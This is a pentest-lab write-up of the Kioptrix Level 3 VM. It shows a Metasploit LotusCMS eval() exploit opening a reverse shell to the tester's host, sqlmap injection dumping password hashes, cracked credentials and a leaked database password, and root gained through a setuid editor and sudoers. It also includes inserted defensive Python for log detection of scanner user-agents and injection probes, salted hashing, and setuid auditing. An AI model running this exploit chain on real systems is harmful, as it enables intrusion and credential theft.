Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 3


Next in the Kioptrix series is level 3.

Important

With the VM there is a README.txt file that says you should update your hosts file with the VM’s IP and hostname, which is kioptrix3.com. I initially ignored it and on the gallery page, all I could see were some broken images and links that didn’t work. I went back and added the entry to my /etc/hosts file, and everything worked fine afterwards.

Start by checking out what’s being exposed with Nmap:

nmap -A -p1-65535 192.168.127.128

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-20 23:56 EEST
Nmap scan report for 192.168.127.128
Host is up (0.00039s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:07:4F:A9 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s take a look at what’s hosted on the web server. It’s a site with a blog page, a gallery and what appears to be an admin login page:

[image: login]

I tried running a sqlmap scan against it, with no success. Next, I thought maybe there might be something about the LotusCMS that powers the site. It turns out there’s a remote execution exploit available in Metasploit:

LotusCMS 3.0 eval() Remote Command Execution

This module exploits a vulnerability found in Lotus CMS 3.0’s Router() function. This is done by embedding PHP code in the ‘page’ parameter, which will be passed to an eval call, therefore allowing remote code execution. The module can either automatically pick up a ‘page’ parameter from the default page, or manually specify one in the URI option. To use the automatic method, please supply the URI with just a directory path, for example: “/lcms/”. To manually configure one, you may do: “/lcms/somepath/index.php?page=index”

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.127.128
RHOST => 192.168.127.128
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.127.159
LHOST => 192.168.127.159
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse handler on 192.168.127.159:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.128:40623) at 2014-06-22 00:37:23 +0300
whoami

www-data

So we have a shell. I could not find a local privilege escalation exploit right away, so I instead started exploring the system.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting, so I looked inside:

cd gallery
ls -l
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

So, there’s all the source code for the gallery. I checked the files that looked interesting until I hit upon the gconfig.php file, which contains the sort of information we need:

/*
  A sample Gallarific configuration file. You should edit
  the installer details below and save this file as gconfig.php
  Do not modify anything else if you don't know what it is.
*/

  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

  $GLOBALS["gallarific_mysql_server"] = "localhost";
  $GLOBALS["gallarific_mysql_database"] = "gallery";
  $GLOBALS["gallarific_mysql_username"] = "root";
  $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I tried SSHing to the box with these credentials and also elevating privileges with su, but that would have been too easy. So more digging in the PHP source code. The gfunctions.php file contains a plethora of information, among which there are some table and column names. There might be more information in the PHP files but I didn’t have the patience to go through all of them.

Back at the gallery, we can see some sorting options:

[image: sort]

Changing the sort filter to photo id makes the URL look like this:

http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

And if I replace the id=1 part with id=', the site spits back a SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by parentid,sort,name' at line 1Could not select category
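The two injection points met so far, LotusCMS's eval() of the `page` parameter and Gallarific's unvalidated numeric `id`, both leave a recognisable trace in the web server's access log. The following is an added example, not code from this post or from either project: it parses Apache combined-format log lines, decodes the query string and flags a `page` value that is not a plain page name, an `id` that is not an integer, and a scanner User-Agent. The log lines, the allowed-character rules for each parameter and the scanner list are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (not taken from the page).
# Line 1: a normal gallery request.
# Line 2: the id=' probe described in the post.
# Line 3: non-identifier characters in LotusCMS's page parameter.
# Line 4: a boolean-style probe in id, sent with a scanner User-Agent.
SAMPLE_LOG = """
192.168.127.159 - - [21/Jun/2014:23:58:01 +0300] "GET /gallery/gallery.php?id=1&sort=photoid HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.127.159 - - [21/Jun/2014:23:58:20 +0300] "GET /gallery/gallery.php?id=%27&sort=photoid HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.127.159 - - [22/Jun/2014:00:37:22 +0300] "POST /index.php?page=index%27%29%3B%2F%2A HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.168.127.159 - - [22/Jun/2014:00:40:00 +0300] "GET /gallery/gallery.php?id=1%20AND%201%3D1&sort=photoid HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev"
""".strip()

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed rules: LotusCMS page names are plain identifiers, Gallarific's id is a
# numeric primary key. Anything else in those parameters is worth a look.
PAGE_OK = re.compile(r'^[A-Za-z0-9_-]+$')
ID_OK = re.compile(r'^\d+$')
SCANNER_UA = ("sqlmap", "nikto", "nmap")


def analyse_line(line):
    """Return a list of (kind, source_ip, path, value) findings for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    url = urlsplit(m.group("target"))
    # parse_qs percent-decodes values, so %27 arrives here as a bare quote.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("page", []):
        if not PAGE_OK.match(value):
            findings.append(("page-param-injection", m.group("ip"), url.path, value))
    for value in params.get("id", []):
        if not ID_OK.match(value):
            findings.append(("id-param-sqli", m.group("ip"), url.path, value))
    ua = m.group("ua").lower()
    if any(tag in ua for tag in SCANNER_UA):
        findings.append(("scanner-user-agent", m.group("ip"), url.path, m.group("ua")))
    return findings


def analyse_log(text):
    """Run analyse_line over every non-empty line of a log and flatten the results."""
    return [f for line in text.splitlines() if line.strip() for f in analyse_line(line)]


if __name__ == "__main__":
    for kind, ip, path, value in analyse_log(SAMPLE_LOG):
        print(f"{kind:22} {ip:16} {path} value={value!r}")
```

The same rules are the ones the application itself should enforce before the value reaches eval() or the SQL string: a page name that matches `PAGE_OK` can be resolved with a lookup, and an id that matches `ID_OK` can be bound as an integer parameter, so the log check doubles as a specification for the input validation that was missing.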

Now that I know SQLi is possible, it’s time to fire sqlmap again!

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbms=MySQL --level=5 --risk=3 --dump

Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+

It was a bit overkill to dump so much information, but I only show here the important bits. To crack the hashes, I used the http://www.hashkiller.co.uk/ site:

dreg’s password: Mast3r

loneferret’s password: starwars
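Both gallery accounts fell in seconds because dev_accounts stores unsalted MD5, so one precomputed table answers every row, and because the same passwords were reused for SSH (just as gconfig.php hands out the MySQL root password in clear text). As an added example, not the author's code or Gallarific's, the block below reproduces the lookup against a small constructed wordlist and then shows the storage the application should have used: a per-user random salt and a slow KDF (PBKDF2-HMAC-SHA256 here), under which a leaked table no longer yields to a shared lookup and two users with the same password do not get the same hash. The wordlist, the iteration count and the `hash_password` record format are assumptions.

```python
import hashlib
import hmac
import os

# The two dev_accounts rows dumped on the page (unsalted MD5 hex digests).
DUMPED_ROWS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed stand-in for a lookup service's table; a real one holds
# billions of precomputed digests, which is why the lookup is instant.
WORDLIST = ["password", "123456", "starwars", "Mast3r", "letmein", "qwerty"]


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def lookup_unsalted(rows, wordlist):
    """Reverse unsalted MD5 digests with one pass over the wordlist.

    A single digest->word table serves every account at once because nothing
    user-specific went into the hash. Returns {user: word or None}.
    """
    table = {md5_hex(w): w for w in wordlist}
    return {user: table.get(digest) for user, digest in rows.items()}


# Assumed record format for the hardened store: iterations$salt_hex$dk_hex
def hash_password(password, salt=None, iterations=210_000):
    """Salted PBKDF2-HMAC-SHA256; a fresh 16-byte salt per call unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    """Recompute the KDF from the stored salt and compare in constant time."""
    iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("unsalted MD5 lookup:", lookup_unsalted(DUMPED_ROWS, WORDLIST))
    rec = hash_password("starwars")
    print("salted record:", rec)
    print("verify correct:", verify_password("starwars", rec))
    print("verify wrong:  ", verify_password("Starwars", rec))
```

With the salted store, cracking one row costs a full wordlist pass through the KDF for that row alone, and a password that has leaked elsewhere still has to be guessed per account rather than read off a shared table.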

Thankfully, these credentials work for SSH login, so I could get rid of the Metasploit shell which kept throwing EOF errors if I didn’t interact with it for a while.

ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.127.128)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ 

In the home directory there’s a CompanyPolicy.README file with the following:

 Hello new employee,
 It is company policy here to use our newly installed software for editing, creating and viewing files.
 Please use the command 'sudo ht'.
 Failure to do so will result in you immediate termination.

 DG
 CEO

So, let’s see what this ht program is all about:

loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht

Looks like a SUID binary! And it seems it’s a hex editor that we can use to view and edit any file on the system!

[image: ht]

Ok, I could crack the root password, but there’s an easier way, by modifying the /etc/sudoers file. First, I had to look up some information about the ht editor. You need to use the F (function) keys for this one. With F6, I could change the mode to text, making it look less horrible. The easiest way I found to go about it was to open the /etc/sudoers file again, after selecting the text mode. Then I added /bin/bash to loneferret’s entry:

[image: sudo bash]

Now save the file and type sudo bash to get the long-awaited root shell. In the /root/ directory there’s also a Congrats.txt file:

root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
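The root path on this box is a configuration problem rather than a bug: a setuid-root copy of a general-purpose editor in /usr/local/bin, plus a sudo rule that runs it as root, together amount to write access on every file, /etc/sudoers included. The audit below is an added example, not code from this post or from any project: it walks a filesystem tree for setuid files outside an expected baseline and parses sudoers rules for commands that are file editors. The baseline set, the editor list and the sample sudoers text are assumptions; the sample mirrors the `sudo ht` policy the CompanyPolicy.README describes.

```python
import os
import stat
import tempfile

# Assumed baseline of setuid-root binaries a stock install is expected to carry
# (not exhaustive). Anything outside it, such as /usr/local/bin/ht, is reported.
BASELINE_SETUID = {
    "/bin/su", "/bin/ping", "/bin/mount", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
}

# Assumed list of programs that open arbitrary files; letting one of them run as
# root through sudo hands over the whole system, which is what happened with ht.
FILE_EDITORS = {"ht", "vi", "vim", "nano", "less", "more", "emacs", "pico"}


def find_setuid(root="/"):
    """Return sorted paths of regular files under root whose mode has the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(root="/", baseline=BASELINE_SETUID):
    """Setuid files that are not on the baseline list."""
    return [p for p in find_setuid(root) if p not in baseline]


def risky_sudo_rules(sudoers_text):
    """Flag (user, command) pairs in sudoers that run a file editor.

    Handles the common 'user host = (runas) [TAG:] cmd, cmd' rule shape; alias
    and Defaults lines are skipped.
    """
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        if line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        who, _, spec = line.partition("=")
        user = who.split()[0]
        spec = spec.strip()
        if spec.startswith("("):          # drop the (runas) list
            spec = spec.split(")", 1)[1]
        for cmd in spec.split(","):
            cmd = cmd.strip()
            for tag in ("NOPASSWD:", "PASSWD:", "SETENV:", "NOEXEC:"):
                if cmd.startswith(tag):
                    cmd = cmd[len(tag):].strip()
            binary = os.path.basename(cmd.split()[0]) if cmd else ""
            if binary in FILE_EDITORS:
                findings.append((user, cmd))
    return findings


# Constructed sudoers sample modelled on the policy the page describes.
SAMPLE_SUDOERS = """
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
%admin ALL=(ALL) ALL
"""


def demo_in_scratch_dir():
    """Build a scratch tree with one setuid file and one plain file, audit it and
    return (unexpected_hits, setuid_path), so the audit can be exercised without
    walking the real root filesystem."""
    d = tempfile.mkdtemp(prefix="suid-audit-")
    setuid_path = os.path.join(d, "ht")
    plain_path = os.path.join(d, "plain")
    for p in (setuid_path, plain_path):
        with open(p, "w"):
            pass
    os.chmod(setuid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return unexpected_setuid(d), setuid_path


if __name__ == "__main__":
    print("scratch-dir audit:", demo_in_scratch_dir()[0])
    print("risky sudo rules:", risky_sudo_rules(SAMPLE_SUDOERS))
```

Run against a real host, `unexpected_setuid("/")` would list /usr/local/bin/ht on this box, and `risky_sudo_rules(open("/etc/sudoers").read())` would flag loneferret's rule; the fix on the page's own terms is to drop the setuid bit from ht and remove the sudo entry, or to grant file editing only through `sudoedit`, which copies the file out and back rather than running the editor as root.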

And this was Kioptrix level 3, with another interesting twist.

Today is the tomorrow you worried about yesterday.
